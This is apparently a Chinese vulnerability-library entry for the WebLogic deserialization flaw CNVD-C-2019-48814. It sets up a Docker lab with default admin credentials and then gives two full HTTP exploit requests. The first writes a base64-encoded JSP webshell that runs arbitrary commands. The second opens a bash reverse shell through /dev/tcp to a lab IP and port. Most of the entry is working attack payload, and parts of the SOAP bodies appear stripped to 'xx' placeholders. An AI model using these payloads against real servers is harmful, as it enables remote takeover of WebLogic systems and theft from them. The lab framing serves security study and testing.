Weblogic反序列化漏洞CNVD-C-2019-48814

—
title: ‘Weblogic反序列化漏洞CNVD-C-2019-48814’
date: Mon, 31 Aug 2020 10:01:23 +0000
draft: false
tags: [‘白阁-漏洞库’]
—

### 影响范围

WebLogic 10.\* / WebLogic 12.1.3.0

### Docker 搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest [http://localhost:49163/console](/static/baige/06-中间件框架漏洞/Weblogic/http://localhost:49163/console) User: weblogic Pass: welcome1

[http://192.168.247.129:49163/\_async/AsyncResponseService](/static/baige/06-中间件框架漏洞/Weblogic/http://192.168.247.129:49163/_async/AsyncResponseService) 确定目标系统对外开放/\_async/AsyncResponseService路径，存在此漏洞

写入shell

“`
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.247.129:49163
Content-Length: 1383
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx




/bin/bash


-c


echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp








“`

 这里可以执行命令了，然后我们尝试反弹shell

“`
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.247.129:49164
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

xx
xx




/bin/bash


-c


bash -i >& /dev/tcp/192.168.247.129/12345 0>&1








“`